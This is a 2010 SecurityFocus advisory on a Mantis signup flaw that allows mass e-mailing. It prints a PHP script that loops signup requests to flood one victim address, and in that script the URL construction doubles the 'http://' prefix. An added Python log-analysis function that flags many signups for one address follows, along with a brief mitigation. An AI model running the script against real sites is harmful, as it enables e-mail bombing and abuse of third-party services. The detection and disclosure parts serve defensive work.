Mantis New Account Signup Mass Emailing Vulnerability

An exploit is not required. An example script capable of exploiting this vulnerability was provided:

<?php

// Please change it, because it is my e-mail :)
$email = "anyemail@address";
$base_user = "test";
$i = 0;
$site = "http://www.example.com";

for ($i=0;$i<=15;$i++)
{
echo("Sending e-mail number $i\n");
$user = "$base_user$i";
echo("New user is $user\n");
$url =
"http://$site/signup.php?username=$user&email=$email";
echo("URL is $url\n");
$fd = fopen($url,"r");
echo("E-mail $i sended\n");
fclose($fd);
}

?>
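
For defenders, the request pattern the script above produces (many signup.php requests carrying different usernames but one e-mail address) is visible in web server access logs. The Python code below is an added example, not part of the original advisory or of Mantis; the Apache-style log format, the threshold and time window, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache access-log style (not real traffic).
SAMPLE_LOG = "\n".join(
    [f'198.51.100.7 - - [12/Mar/2010:10:00:0{i} +0000] "GET /signup.php'
     f'?username=test{i}&email=victim%40example.org HTTP/1.1" 200 512' for i in range(5)]
    + ['203.0.113.9 - - [12/Mar/2010:10:03:00 +0000] "GET /signup.php'
       '?username=alice&email=alice%40example.net HTTP/1.1" 200 512',
       '203.0.113.9 - - [12/Mar/2010:10:03:05 +0000] "GET /login_page.php HTTP/1.1" 200 900'])

# Client IP, timestamp and request target of one access-log line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) ')

def parse_signups(log_text):
    """Yield (timestamp, client_ip, username, email) for each signup.php request
    whose query string carries both parameters (as in the script on this page)."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, target = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/signup.php"):
            continue
        q = parse_qs(parts.query)
        if "username" in q and "email" in q:
            when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
            yield when, ip, q["username"][0], q["email"][0].lower()

def flag_mass_signup(log_text, max_accounts=3, window=timedelta(minutes=10)):
    """Return {email: sorted usernames} for every address that received signup
    requests for more than max_accounts distinct usernames inside the window."""
    by_email = defaultdict(list)
    for when, _ip, user, email in parse_signups(log_text):
        by_email[email].append((when, user))
    flagged = {}
    for email, events in by_email.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1  # slide the window forward
            if len({u for _, u in events[start:end + 1]}) > max_accounts:
                flagged[email] = sorted({u for _, u in events})
                break
    return flagged
```

The same per-address count, enforced inside the signup handler instead of after the fact, is the corresponding mitigation: refuse or delay a new signup once one address has been used for several pending accounts.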


 

Copyright 2010, SecurityFocus